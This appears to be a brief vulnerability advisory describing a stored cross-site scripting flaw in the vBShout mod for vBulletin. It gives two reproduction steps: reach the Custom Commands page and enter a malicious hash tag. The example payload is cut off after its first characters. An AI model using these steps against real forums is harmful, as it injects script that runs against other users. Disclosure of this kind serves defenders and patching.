vBulletin vBShout Mod – Stored XSS Vulnerability

Stage 1: Go to -> UserCP -> Custom Commands
(Direct Link:) http://127.0.0.1/[path]/vbshout.php?do=profile&action=customcommands

Stage 2: Add a malicious hash tag.
(Example:) “>

评论关闭。